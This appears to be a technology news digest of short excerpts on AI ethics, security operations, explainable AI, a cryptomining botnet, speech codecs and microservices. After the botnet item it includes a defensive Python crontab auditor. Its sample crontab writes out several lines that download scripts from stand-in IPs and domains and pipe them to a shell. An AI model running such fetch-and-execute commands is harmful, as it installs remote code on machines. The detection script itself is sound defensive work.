Looking For An AI Ethicist? Good Luck
Just like with the hunt for data scientists, the person in charge of driving the
AI ethics strategy at a company ideally will have a long list of qualifications.
According to Ammanath, who was a Datanami Person to Watch for 2020, an AI
ethicist generally should have the following skills and capabilities: an
understanding of AI tools and technology; an understanding of the business
and the industry and the specific AI ethical traps that exist in them; good
communication skills and the ability to work across organizational
boundaries; and regulatory, legal, and policy knowledge. There are
additional skills that may be required, such as having experience with the
philosophical, psychological, or sociological aspects of ethics; knowing how to
structure a business and a team in an ethical manner; and even knowing how to
mitigate the environmental impact of using AI. “The point is that you need to
have a wide variety of skills,” Ammanath says. “It’s like finding that
unicorn…Trying to find that person with credible experience and knowledge in all
of these areas is practically impossible.” So where does that leave you? The
odds are, unless you’re working at a very large enterprise, you won’t be able to
find a person to fit this exact job description.
Building a Next-Generation SOC Starts With Holistic Operations
Today's reimagined SOCs bring together disparate teams to counteract intrusions,
providing everyone with a coordinated, holistic, real-time view. This tactic
empowers analysts to head things off, "shifting left" in the cyber kill chain to
identify the full scope of the attack while it's happening and quickly block it
as far upstream as possible (ideally using automated investigation and
response). We see this as the only way for SOCs to address new threats in time
to avert major business impacts. It's time to empower your SOC with multidomain,
central teams. It's more than tools differentiating a reactive SOC from an
agile, proactive, successful one. Modernizing security operations requires an
operational model that drives cross-technology integration to match the
attacker's modus operandi. Empowering your SOC to deploy speedy, effective
countermeasures means dangerous attackers will be slowed or deterred, reducing
damage to your business and saving valuable time and money. The proper template
for a modernized SOC team operates seamlessly across domains with an end-to-end
view. Consider your SOC's opposition: Sophisticated bad actors see the entire
picture, know where they're going and who they're engaging, and understand how
to exploit weaknesses.
Can we explain AI? An Introduction to Explainable Artificial Intelligence.
Why do we need to explain AI? This is a question that has no simple answer to
it. Suppose you take the example of my project that I mentioned initially. In
that case, the controller might want to understand our trust models. It is
hard to believe something we do not understand. We have a problem when we
cannot explain the decisions made by an algorithm. In assessing AI’s
decisions, it is crucial to assess the factors that led to that decision. We
will therefore be able to audit and challenge decisions or work to improve the
factors. This is where the importance of xAI, or explainable AI, comes in,
which addresses the need to be able to interpret a model of Machine Learning.
This is because it is typical for the formulation of problems addressed by ML
to be incomplete. Often, forecasting is not enough to address a problem. It is
essential to know more than just “what,” but also “why,” “how.” It is not
enough to know that a teacher has been poorly classified in one year; it is
also essential to know the reason for improvement. Although AI is one of the
most important and disruptive technologies of the century, it is subject to
bias. Good model accuracy can be a trap.
Why IT Should Have a Separate Training Budget
Large IT organizations can fund their own training departments, complete with
their own training directors. Often these individuals have experience in both
IT and education -- and they do a great job. But in many other cases, there is
no formal IT training function -- only an IT training budget. In these cases,
the CIO, project managers and other IT leadership must step in. They identify
the core skills that they need and the individuals whom they want to send to
these trainings -- and what the training will cost. This strategy of
collectively evaluating IT staff, with each manager coming forth with his or
her staff training needs, works -- but it’s far from flawless. The major
downside is that people who are not skilled in education or training might not
make the right training choices -- either in courses or in the people they
send. ... Hot projects and keeping systems running are IT priorities, not
training. So, if there is a hot project, or a major performance issue with an
existing system, training is quickly forgotten. The result is that training
that was budgeted gets deferred or isn't used at all. This makes for a very
tough fight for the CIO when the next budget review comes around. The CFO will
undoubtedly challenge the IT training budget, saying that the budget was
underused last year so should be re-funded at that lesser level.
Indian Vaccine Makers, Oxford Lab Reportedly Hacked
The Chinese state-backed hacking group APT10, also known as Stone Panda, has
in recent weeks targeted the IT systems of two Indian pharmaceutical makers
whose coronavirus vaccines are being used in the country's immunization
program, the Reuters news service reports, citing a report from Tokyo,
Japan-based cybersecurity firm Cyfirma. That company says that hackers
identified gaps and vulnerabilities in the IT infrastructure and supply chain
software of the pharmaceutical firm Bharat Biotech and the Serum Institute of
India, or SII, one of the largest vaccine makers globally, Reuters reports.
Cyfirma says the apparent motivation behind the hackers' efforts was an
attempt to exfiltrate intellectual property of the pharmaceutical firms,
according to Reuters. SII is making the AstraZeneca vaccine for many countries
and will soon start bulk-manufacturing Novavax shots, the news service
reports. Cyfirma, SII and Bharat Biotech did not immediately respond to
Information Security Media Group's requests for comment. ... Meanwhile, last
week, Forbes reported that U.K.-based Oxford University's Division of
Structural Biology – known as Strubi – had been hacked, with equipment used to
prepare biochemical samples targeted.
Rethinking the artificial intelligence race
The way that AI systems are developed naturally creates doubts about their
ability to function in untested environments, namely the requirement of large
amounts of data inputs, the necessity that they be nearly perfect, and the
effects of the preconceived notions of its creators. First, lack of, or
erroneous, data is one of the largest challenges, especially when relying on
machine learning techniques. To teach a computer to recognize a bird, it must
be fed thousands of pictures to “learn” a bird’s distinguishing features,
which naturally limits use in fields with few examples. Additionally, if even
a tiny portion of the data is incorrect (as little as 3%), the system may
develop incorrect assumptions or suffer drastic decreases in performance.
Finally, the system may also recreate assumptions and prejudices—racist,
sexist, elitist, or otherwise—from extant data that already contains inherent
biases, such as resume archives or police records. These could also be coded
in as programmers inadvertently impart their own cognitive biases into the
machine learning algorithms they design. This propensity for deep-seated
decision-making problems, which may only become evident well after
development, will prove problematic to those that want to rely heavily on AI,
especially concerning issues of national security.
How Leaders Can Help Their Teams Manage Stress in the New Year
Employees need to take vacations to reset and get their minds off of their
work, but modern work policies don’t encourage time off the way they should.
Plenty of companies offer generous or even unlimited amounts of vacation time,
but workers are reticent to indulge lest they fall behind. The easiest
solution to this issue is to simply mandate that workers take the time off
they need. To combat the high-stress levels endemic to companies in their
industry, game developer Supergiant Games instituted a policy stating that
workers must take a minimum of 20 days off annually while still allowing for
unlimited time away. A similar policy for your workplace will help employees
cool off right when they need to the most. ... Your workers will never be able
to achieve stress equilibrium if their boss can’t do it first. Being a great
business leader isn’t just about telling people what they need to do; it’s
about modeling those behaviors yourself. If you’re preaching stress reduction
to your team while clocking in 11 hours a day, no one is going to be able to
take your messaging seriously. Stress management starts with you, whether you
like it or not.
Google Introduces Low Bitrate Speech Codec For Smoother Communication
Lyra is a novel method for compressing and transmitting voice signals. For this,
the researchers applied traditional codec techniques and the latest machine
learning methods on models trained on vast amounts of data. Lyra extracts
features or distinctive speech attributes (list of numbers representing the
speech energy in different frequency bands, called log mel spectrograms) from
the input every 40ms and compresses before transmitting. At the receiving end, a
generative model converts the features to a speech signal. Lyra’s new and
improved ‘natural-sounding’ generative models maintain a low bitrate of codecs
to achieve high-quality codecs, generally on par with state-of-art waveform
codecs used in streaming platforms. However, one drawback of these generative
models is computational complexity. To overcome this, Lyra uses a cheaper
variation of WaveRNN, a recurrent generative model. Though it works at a lower
rate, it generates multiple parallel signals in different frequencies. These
signals are then combined to output a signal at the desired sample rate. Hence,
Lyra works on cloud servers and mid-range phones with a processing latency of
90ms.
Cryptomining Botnet Uses Bitcoin Wallet to Avoid Detection
The initial infection starts with the exploitation of remote code execution
vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP
(CVE-2019-9082). The payload delivered causes the vulnerable machine to download
and execute a malicious shell script. "In older campaigns, the shell script
itself handled the key functions of infection. The stand-alone script disabled
security features, killed off competing infections, established persistence, and
in some cases, continued infection attempts across networks found within the
known host files," the report notes. But the newer instances of the shell script
are written with fewer lines of code and use binary payloads for handling more
system interactions, such as killing off competition, disabling security
features, modifying SSH keys, downloading malware and starting the miners.
Researchers note that the operators behind the campaign use cron jobs and
rootkits for persistence and updates to distribution, ensuring infected machines
will regularly check in and be reinfected with the latest version of the
malware. These methods rely on domains and static IP addresses written into
crontabs and configurations, and these domains and IP addresses routinely get
identified and seized, the researchers say.
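The persistence method described above, download-and-run jobs in crontabs that point at fixed domains and IP addresses, can be checked for on a host. The following is an added example, not code from the report or from this digest: a Python audit that flags crontab entries which fetch remote content and pipe it to a shell, or fetch from a literal IPv4 address. The sample crontab, its addresses and its domains are constructed for illustration, and the parser assumes the user-crontab format (five schedule fields or an `@` keyword).

```python
import re

# Constructed sample crontab (not from the report). Addresses are RFC 5737
# documentation ranges and the domains are reserved example names.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.7/u.sh | sh
*/30 * * * * wget -q -O- http://updates.example.net/i.sh | bash
@reboot /usr/bin/python3 /opt/app/worker.py
15 * * * * (curl -s 198.51.100.23:8080/x||wget -qO- 198.51.100.23:8080/x)|sh
0 1 * * 0 curl -s https://mirror.example.org/pkg.tar.gz -o /tmp/pkg.tar.gz
"""

FETCH = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def split_command(line):
    """Return the command of a user-crontab entry, or None for other lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGN.match(line):
        return None
    # "@reboot cmd" has one schedule token; normal entries have five fields.
    parts = line.split(None, 1 if line.startswith("@") else 5)
    expected = 2 if line.startswith("@") else 6
    return parts[-1] if len(parts) == expected else None

def audit_crontab(text):
    """Flag entries that download and execute, or fetch from a literal IP."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        cmd = split_command(raw)
        if cmd is None or not FETCH.search(cmd):
            continue
        ips = sorted(set(IPV4.findall(cmd)))
        hosts = sorted({h for h in URL_HOST.findall(cmd) if not IPV4.fullmatch(h)})
        reasons = []
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("fetch-and-execute")
        if ips:
            reasons.append("hard-coded-ip")
        if reasons:  # a plain download to a file by hostname is not flagged
            findings.append({"line": lineno, "reasons": reasons,
                             "indicators": ips + hosts})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f)
```

The same function can be run over the output of `crontab -l` for each account; a job that downloads to a file and executes it in a later step is outside what this check detects.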
Saga Orchestration for Microservices Using the Outbox Pattern
There are two general ways for implementing distributed Sagas—choreography and
orchestration. In the choreography approach, one participating service sends a
message to the next after it has executed its local transaction. With
orchestration, on the other hand, there’s one coordinating service that invokes
one participant after the other. Both approaches have their pros and cons.
Personally, I prefer the orchestration approach, as it defines one central place
that can be queried to obtain the current status of a particular Saga (the
orchestrator, or “Saga execution coordinator,” SEC for short). Since it avoids
point-to-point communication between participants, (other than the
orchestrator), it also allows for the addition of further intermediary steps
within the flow, without the need to adjust each participant. Before diving into
the implementation of such Saga flow, it’s worth spending some time to think
about the transactional semantics that Sagas provide. ... From a service
consumer point of view—e.g., a user placing a purchase order with the order
service—the system is eventually consistent; i.e., it will take some time until
the purchase order is in its correct state, as per the logic of the different
participating services.
Quote for the day:
"In any leadership position, the most
important aspect of your job will be getting your team to work together." --
Dale Brown